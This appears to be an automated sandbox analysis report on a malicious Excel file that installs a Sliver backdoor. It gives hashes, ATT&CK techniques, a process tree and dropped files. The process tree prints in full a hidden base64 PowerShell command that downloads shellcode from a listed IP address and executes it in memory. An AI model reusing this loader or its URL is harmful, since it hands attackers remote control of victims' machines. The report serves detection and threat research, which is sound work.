sliver | d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f

General

Target

d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f.xls
Size

46KB
MD5

88d24e11d952ac036b9bcc1578211f67
SHA1

8854515373e2d1449f91f027cfa467d1272287e9
SHA256

d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f
SHA512

b2d44d8851a5e70afb1473ef82f89ac40c0dec3a56ecd5db9c381635188bc78e9c64dd4acce6e31db563c8fc9bb7a20c760f2164ae7608709e1c513abd6f82d1
SSDEEP

768:T4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:USFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5012	2264	powershell.exe	82

Sliver RAT v2 6 IoCs

resource	yara_rule
behavioral2/memory/5012-63-0x0000018F54CF0000-0x0000018F5576E000-memory.dmp	SliverRAT_v2
behavioral2/memory/5012-64-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp	SliverRAT_v2
behavioral2/memory/5012-66-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp	SliverRAT_v2
behavioral2/memory/5012-65-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp	SliverRAT_v2
behavioral2/memory/5012-67-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp	SliverRAT_v2
behavioral2/memory/5012-72-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 22 IoCs

flow	pid	Process
24	5012	powershell.exe
25	5012	powershell.exe
28	5012	powershell.exe
34	5012	powershell.exe
36	5012	powershell.exe
38	5012	powershell.exe
39	5012	powershell.exe
40	5012	powershell.exe
41	5012	powershell.exe
42	5012	powershell.exe
43	5012	powershell.exe
44	5012	powershell.exe
52	5012	powershell.exe
59	5012	powershell.exe
60	5012	powershell.exe
61	5012	powershell.exe
62	5012	powershell.exe
63	5012	powershell.exe
64	5012	powershell.exe
65	5012	powershell.exe
66	5012	powershell.exe
67	5012	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5012	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2264	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5012	powershell.exe
5012	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	5012	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE
2264	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2264 wrote to memory of 5012	2264	EXCEL.EXE	87
PID 2264 wrote to memory of 5012	2264	EXCEL.EXE	87
PID 5012 wrote to memory of 976	5012	powershell.exe	89
PID 5012 wrote to memory of 976	5012	powershell.exe	89
PID 976 wrote to memory of 4024	976	csc.exe	91
PID 976 wrote to memory of 4024	976	csc.exe	91

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d3645c6f005381366ad46a3258ae9b7596b2f6be6e7cb17f1919e6e11379e58f.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5012
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykmnjd2l\ykmnjd2l.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C7E.tmp" "c:\Users\Admin\AppData\Local\Temp\ykmnjd2l\CSC274CFB4AF17B4DC0985AE922CA59A5C6.TMP"
      4⤵
      PID:4024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9C7E.tmp

Filesize
1KB

MD5
190f7a4be4ea9d84653b372cd4321f7e

SHA1
d2e989cfa03f2c8c607335f397fa4e635c8b0c24

SHA256
ad5071f1c031d81cca00cbbecd752946db84689ca387e9f4319c751959e22ac3

SHA512
8f923fce60a0eb48e438d6e1c69a9f63c80e2dfa45809e5a31e691e758e0540304669d8185915a6e9d8014c9788b039aa132cf797deddd7e6b98a153e9d066e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cy1fjpgx.qjb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ykmnjd2l\ykmnjd2l.dll

Filesize
3KB

MD5
9c02d63a2a70987db3cf3eb4cbd3848f

SHA1
ebe1c7b2570d0ebb6a08ef787828184e353c5c98

SHA256
722dbcd0bc7aaf5620a5490aca1a02b8ce9a0aae886b52410ab451fdd36b802e

SHA512
567eba1759df02d2236fa0dc7e2a3b3bee37c2ef51d27fe8f6d7b82b605cf2b5adca137de091e538a24e7ddb4d0a66b5f9094a46439600094a4e810d7cb8195b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
d9e1e7d960ff3344f99d0f0f4880faea

SHA1
a08348ba7614f70eadabcc3b45262186d5edc45d

SHA256
11651ec1f11f2862485dd74f689783248d5399079bcaf83f2e29a5b0797ed767

SHA512
ba26103326ac23918d420f7503d85c80cefee01b9eafd3ad9525fc5d2606ded9e58b80f6d2cc58d2b2d7361eb3570463851233a01b0d0302b62639d4a88b5aba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykmnjd2l\CSC274CFB4AF17B4DC0985AE922CA59A5C6.TMP

Filesize
652B

MD5
0f9cb1a7dc5f5bf898b00ff7c42a9b0e

SHA1
7fed049998becabbbd8554877a0c78f69b7b9f5a

SHA256
251771a8d9f2eb818f74ca53bed6a97bd102078d80510eb4379353f936d7cb54

SHA512
b47062b1a24459d3e05136ad8dafefab276887f46403f746df88174e54b408bb3d77e4ae930b8998d5235e0bffece1932ffafe569c7a0012c8ce006beb2799b8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykmnjd2l\ykmnjd2l.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykmnjd2l\ykmnjd2l.cmdline

Filesize
369B

MD5
72cc444b08eff005265dbfb90e7c63f5

SHA1
6da74f3276142dbe7710e892af8ab5591113a6a5

SHA256
ea2906bfd28419914acebb6f4a1053ed92b189ea01e6020d8c1314c580da98cf

SHA512
b874147526aa52aa953514c4c931ba2b1405e1ad8a72ffcb523af944de2649da355fdb448c1c1db7a53c4c8f097eded84230286ab461bf3c6385a756e5eb1327

Download Submit
memory/2264-29-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-4-0x00007FFC38CF0000-0x00007FFC38D00000-memory.dmp

Filesize
64KB

Download
memory/2264-11-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-12-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-13-0x00007FFC369B0000-0x00007FFC369C0000-memory.dmp

Filesize
64KB

Download
memory/2264-10-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-8-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-14-0x00007FFC369B0000-0x00007FFC369C0000-memory.dmp

Filesize
64KB

Download
memory/2264-15-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-17-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-16-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-18-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-19-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-0-0x00007FFC38CF0000-0x00007FFC38D00000-memory.dmp

Filesize
64KB

Download
memory/2264-28-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-7-0x00007FFC38CF0000-0x00007FFC38D00000-memory.dmp

Filesize
64KB

Download
memory/2264-2-0x00007FFC38CF0000-0x00007FFC38D00000-memory.dmp

Filesize
64KB

Download
memory/2264-9-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-6-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-5-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-1-0x00007FFC78D0D000-0x00007FFC78D0E000-memory.dmp

Filesize
4KB

Download
memory/2264-3-0x00007FFC38CF0000-0x00007FFC38D00000-memory.dmp

Filesize
64KB

Download
memory/2264-71-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/2264-61-0x00007FFC78D0D000-0x00007FFC78D0E000-memory.dmp

Filesize
4KB

Download
memory/2264-62-0x00007FFC78C70000-0x00007FFC78E65000-memory.dmp

Filesize
2.0MB

Download
memory/5012-63-0x0000018F54CF0000-0x0000018F5576E000-memory.dmp

Filesize
10.5MB

Download
memory/5012-64-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp

Filesize
10.9MB

Download
memory/5012-66-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp

Filesize
10.9MB

Download
memory/5012-65-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp

Filesize
10.9MB

Download
memory/5012-67-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp

Filesize
10.9MB

Download
memory/5012-57-0x0000018F544E0000-0x0000018F544E8000-memory.dmp

Filesize
32KB

Download
memory/5012-72-0x0000018F561F0000-0x0000018F56CD6000-memory.dmp

Filesize
10.9MB

Download
memory/5012-44-0x0000018F54540000-0x0000018F54562000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads